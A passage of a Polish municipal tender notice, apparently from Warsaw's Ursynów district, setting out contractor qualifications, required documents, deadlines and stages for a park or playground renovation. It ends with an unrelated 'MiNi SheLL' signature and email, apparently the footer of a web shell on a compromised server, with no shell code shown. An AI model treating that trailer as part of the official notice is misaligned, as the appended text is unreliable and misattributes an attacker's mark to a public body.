rekreacyjny.<br/>4 Park - teren rekreacyjny, przeważnie z dużą ilością roślinności, w tym często zadrzewiony, wyposażony w małą architekturę (ławki, kosze na śmieci i in.)<br/>Uwaga 2!<br/>W przypadku gdy dla potwierdzenia spełniania ww. warunku udziału w postępowaniu Wykonawca wykaże się robotą budowlaną polegającą na przebudowie/modernizacji/remoncie placu zabaw2, skweru3 lub parku4 powierzchnia przebudowywanej/modernizowanej/remontowanej części placu zabaw2, skweru3 lub parku4 była nie mniejsza niż 2000 m².<br/>1)	dysponują osobami zdolnymi do wykonania zamówienia, a w szczególności:<br/>a)	co najmniej jedną osobą wyznaczoną do sprawowania funkcji kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi co najmniej w ograniczonym zakresie w specjalności konstrukcyjno-budowlanej lub odpowiednie wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie wydane obywatelom innych Państw, z zastrzeżeniem art.12a. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j.: Dz.U. 2021.2351 z późn. zm.)<br/>oraz<br/>b)	co najmniej jedną osobą wyznaczoną do kierowania pracami ogrodniczymi, posiadającą wykształcenie wyższe o kierunku „ogrodnictwo” lub „architektura krajobrazu” oraz 3 lata praktyki w zawodzie, lub wykształcenie średnie ogrodnicze lub architektura krajobrazu oraz min. 5 lat praktyki w zawodzie<br/>Uwaga! W zakresie osób skierowanych do realizacji zamówienia postanowienia pkt 1.6 ppkt 1a) STWiOR w części pn. ZIELEŃ nie mają zastosowania. W odniesieniu zatem do osoby skierowanej do realizacji zamówienia na stanowisko kierownika prac ogrodniczych wiążące są jedynie postanowienia warunku udziału w postępowaniu w którym mowa w pkt 9.2.2 b) SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz robót budowlanych (zgodny z załącznikiem nr 4 do SWZ) wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa w pkt 10.3 lit. a) SWZ dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>b)	wykaz osób (zgodny z załącznikiem nr 5 do SWZ) skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający dopuszcza możliwość składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. spółki cywilne lub konsorcja (tj. dwóch lub więcej Wykonawców) w ramach oferty wspólnej w rozumieniu art. 58 ustawy pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>1)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2)	Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>•	postępowania o zamówienie publiczne, którego dotyczy,<br/>•	wszystkich Wykonawców ubiegających się wspólnie udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>•	ustanowionego Pełnomocnika oraz zakresu jego umocowania.<br/>3)	Dokument pełnomocnictwa musi być podpisany przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, przy czym nie jest wymagany podpis pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.<br/>4)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5)	W przypadku, o którym mowa w pkt. 4) wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (wg załącznika nr 9 do SWZ).<br/>6)	Oświadczenie, o którym mowa w pkt. 10.1. lit b) SWZ składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu, w zakresie, w jakim każdy z wykonawców wskazuje spełnienie warunków udziału w postępowaniu.<br/>7)	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W odniesieniu do art. 455 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w przypadkach określonych w § 23 <br/>projektowanych postanowień umowy stanowiących Załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-10 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-10 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. TERMIN WYKONANIA ZAMÓWIENIA: od dnia zawarcia umowy do dnia 15.12.2024 r. a w tym:<br/>Etap I A - od dnia zawarcia umowy do dnia 15.12.2022 r.<br/>Etap I B - na prace pielęgnacyjne roślin w okresie gwarancji na okres 24 miesięcy od dnia podpisania bezusterkowego protokołu końcowego Etapu I A.<br/>Termin realizacji prawa opcji:<br/>Opcja 1 - Etap II <br/>a)	Etap II A - na okres 12 tygodni na roboty budowlane i ogrodnicze wraz z dostawą elementów małej architektury od dnia złożenia pisemnego oświadczenia, zgodnie z § 3 ust. 2 projektowanych postanowień umowy (załącznik 3 do SWZ)<br/>b)	Etap II B - na okres 24 miesięcy na prace pielęgnacyjne roślin od dnia podpisania bezusterkowego protokołu końcowego Etapu II A.<br/>Opcja 2 - Etap III na okres 12 tygodni na roboty budowlane od dnia złożenia pisemnego oświadczenia, zgodnie z § 3 ust. 2 projektowanych postanowień umowy (załącznik 3 do SWZ)<br/><br/>2. Zamawiający wykluczy z postępowania Wykonawców, w stosunku do których zachodzą przesłanki wykluczenia wskazane w art. 108 ust. 1 ustawy Pzp oraz w art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r., poz. 835).<br/><br/>3. Dokumenty podmiotów zagranicznych<br/>Wykonawca zagraniczny składa dokumenty zgodnie z zapisami pkt. 9 i 10 SWZ, ze szczególnym uwzględnieniem, aby dokumenty złożone wraz z ofertą potwierdzały, iż oferta została podpisana przez osobę/y uprawnioną/e do reprezentowania Wykonawcy.<br/><br/>4. Osobami uprawnionymi do porozumiewania się z Wykonawcami są:<br/>- w zakresie dotyczącym przedmiotu zamówienia:<br/>Tomasz Nowakowski – inspektor w Wydziale Ochrony Środowiska, tel. 22 443-72-64<br/>- w zakresie dotyczącym zagadnień formalno-prawnych:<br/>Iwona Glinka – główny specjalista w Wydziale Zamówień Publicznych, tel. 22 443-73-33<br/>e-mail: ursynow.wzp@um.warszawa.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com